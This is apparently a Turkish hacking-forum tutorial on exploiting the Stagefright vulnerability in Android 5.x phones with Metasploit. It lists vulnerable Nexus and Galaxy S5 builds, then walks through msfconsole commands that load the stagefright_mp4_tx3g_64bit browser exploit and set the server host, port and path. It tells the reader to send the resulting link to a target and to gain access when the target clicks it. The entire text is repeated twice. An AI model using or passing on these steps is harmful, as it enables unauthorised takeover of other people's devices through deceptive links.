iyi günler bir onceki yazımızda ip adresi uzerinden nasıl sızılabileceginden bahsetmistik ve local agın biraz dısarısına cıkmıstık onada surdan ulasabılırsınız ;
https://www.turkhackteam.org/web-server-guvenligi/1712870-ip-adresinden-sizmak.html
Öncelikle kullanacagımız açık artık guncelligini nekadar kaybetmiş bir açıkta olsa. bulunma ihtimali olan bir açık
Bu açık turunu kullanarak 8-9 ay once samsung galaxy s5(android 5.0.1) cihaza sızma testi yapıp başarılı oldugumuda belirtmek isterim
kullanacagimiz acık "stage fright" adındaki bir acik olup browser acıgıdır ve mr.robottada sozu gecmıstır
Acıgın bulundugu cihazlar ;
1 Nexus 7 (Wi-Fi) (razor) with Android 5.0 (LRX21P)
2 Nexus 7 (Wi-Fi) (razor) with Android 5.0.1 (LRX22C)
3 Nexus 7 (Wi-Fi) (razor) with Android 5.0.2 (LRX22G)
4 Nexus 7 (Wi-Fi) (razor) with Android 5.1 (LMY47O)
5 Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY47V)
6 Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48G)
7 Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48I)
8 Nexus 7 (Mobile) (razorg) with Android 5.0.2 (LRX22G)
9 Nexus 7 (Mobile) (razorg) with Android 5.1 (LMY47O)
10 Nexus 7 (Mobile) (razorg) with Android 5.1.1 (LMY47V)
11 Nexus 5 (hammerhead) with Android 5.0 (LRX21O)
12 Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)
13 Nexus 5 (hammerhead) with Android 5.1 (LMY47D)
14 Nexus 5 (hammerhead) with Android 5.1 (LMY47I)
15 Nexus 5 (hammerhead) with Android 5.1.1 (LMY48B)
16 Nexus 5 (hammerhead) with Android 5.1.1 (LMY48I)
17 Nexus 6 (shamu) with Android 5.0 (LRX21O)
18 Nexus 6 (shamu) with Android 5.0.1 (LRX22C)
19 Nexus 6 (shamu) with Android 5.1 (LMY47D)
20 Nexus 6 (shamu) with Android 5.1 (LMY47E)
21 Nexus 6 (shamu) with Android 5.1 (LMY47I)
22 Nexus 6 (shamu) with Android 5.1.1 (LYZ28E)
23 Nexus 6 (shamu) with Android 5.1 (LMY47M)
24 Nexus 6 (shamu) with Android 5.1.1 (LMY47Z)
25 Nexus 6 (shamu) with Android 5.1.1 (LVY48C)
26 Nexus 6 (shamu) with Android 5.1.1 (LMY48I)
27 Nexus 6 (shamu) with Android 5.1.1 (LYZ28J)
28 Nexus 6 (shamu) with Android 5.1.1 (LVY48E)
29 Samsung Galaxy S5 (VZW SM-G900V) with Android 5.0 (LRX21T)
neyse sizide cok sıkmadan yapılısına geceyım
oncelikle bir linux distro'su kullanmanız daha iyi olucaktır ve m.e.t.a.sploit framework adlı yazılımıda kurmanız gerekmektedir .
hadi baslayalım
UYGULAMA;
service postgresql start --> postqresql servisini baslatmaya yarar
msfconsole --> m.e.t.asploiti baslatır
yukarıdaki 2 komutu terminal ekranina yazarak m.e.t.asploiti baslatalım
use exploit/android/browser/stagefright_mp4_tx3g_64bit --> yazarak exploitimizi secelim
ifconfig --> yazarak local ip adresimizi ogrenelim
set SRVHOST (ipadresi) --> diyerek srvhostumuzu secelım
set SRVPORT (80/8080) --> diyerek srvportumuzu secelım 2 portuda secebilirsiniz
set URIPATH ("/" veya "/a") --> diyelim bu tercihinize kalmıs ıstedıgınızı secebılırsınız /oyun seklindede yapabilirsiniz
exploit --> diyerek isleme baslayalım
exploit dedikten sonra cıkan lınki kopyalayıp hedefe atalım hedef lınke tıklarsa acık varsa erisim saglarsınızz ..
https://www.turkhackteam.org/web-server-guvenligi/1712870-ip-adresinden-sizmak.html
Öncelikle kullanacagımız açık artık guncelligini nekadar kaybetmiş bir açıkta olsa. bulunma ihtimali olan bir açık
Bu açık turunu kullanarak 8-9 ay once samsung galaxy s5(android 5.0.1) cihaza sızma testi yapıp başarılı oldugumuda belirtmek isterim
kullanacagimiz acık "stage fright" adındaki bir acik olup browser acıgıdır ve mr.robottada sozu gecmıstır
Acıgın bulundugu cihazlar ;
1 Nexus 7 (Wi-Fi) (razor) with Android 5.0 (LRX21P)
2 Nexus 7 (Wi-Fi) (razor) with Android 5.0.1 (LRX22C)
3 Nexus 7 (Wi-Fi) (razor) with Android 5.0.2 (LRX22G)
4 Nexus 7 (Wi-Fi) (razor) with Android 5.1 (LMY47O)
5 Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY47V)
6 Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48G)
7 Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48I)
8 Nexus 7 (Mobile) (razorg) with Android 5.0.2 (LRX22G)
9 Nexus 7 (Mobile) (razorg) with Android 5.1 (LMY47O)
10 Nexus 7 (Mobile) (razorg) with Android 5.1.1 (LMY47V)
11 Nexus 5 (hammerhead) with Android 5.0 (LRX21O)
12 Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)
13 Nexus 5 (hammerhead) with Android 5.1 (LMY47D)
14 Nexus 5 (hammerhead) with Android 5.1 (LMY47I)
15 Nexus 5 (hammerhead) with Android 5.1.1 (LMY48B)
16 Nexus 5 (hammerhead) with Android 5.1.1 (LMY48I)
17 Nexus 6 (shamu) with Android 5.0 (LRX21O)
18 Nexus 6 (shamu) with Android 5.0.1 (LRX22C)
19 Nexus 6 (shamu) with Android 5.1 (LMY47D)
20 Nexus 6 (shamu) with Android 5.1 (LMY47E)
21 Nexus 6 (shamu) with Android 5.1 (LMY47I)
22 Nexus 6 (shamu) with Android 5.1.1 (LYZ28E)
23 Nexus 6 (shamu) with Android 5.1 (LMY47M)
24 Nexus 6 (shamu) with Android 5.1.1 (LMY47Z)
25 Nexus 6 (shamu) with Android 5.1.1 (LVY48C)
26 Nexus 6 (shamu) with Android 5.1.1 (LMY48I)
27 Nexus 6 (shamu) with Android 5.1.1 (LYZ28J)
28 Nexus 6 (shamu) with Android 5.1.1 (LVY48E)
29 Samsung Galaxy S5 (VZW SM-G900V) with Android 5.0 (LRX21T)
neyse sizide cok sıkmadan yapılısına geceyım
oncelikle bir linux distro'su kullanmanız daha iyi olucaktır ve m.e.t.a.sploit framework adlı yazılımıda kurmanız gerekmektedir .
hadi baslayalım
UYGULAMA;
service postgresql start --> postqresql servisini baslatmaya yarar
msfconsole --> m.e.t.asploiti baslatır
yukarıdaki 2 komutu terminal ekranina yazarak m.e.t.asploiti baslatalım
use exploit/android/browser/stagefright_mp4_tx3g_64bit --> yazarak exploitimizi secelim
ifconfig --> yazarak local ip adresimizi ogrenelim
set SRVHOST (ipadresi) --> diyerek srvhostumuzu secelım
set SRVPORT (80/8080) --> diyerek srvportumuzu secelım 2 portuda secebilirsiniz
set URIPATH ("/" veya "/a") --> diyelim bu tercihinize kalmıs ıstedıgınızı secebılırsınız /oyun seklindede yapabilirsiniz
exploit --> diyerek isleme baslayalım
exploit dedikten sonra cıkan lınki kopyalayıp hedefe atalım hedef lınke tıklarsa acık varsa erisim saglarsınızz ..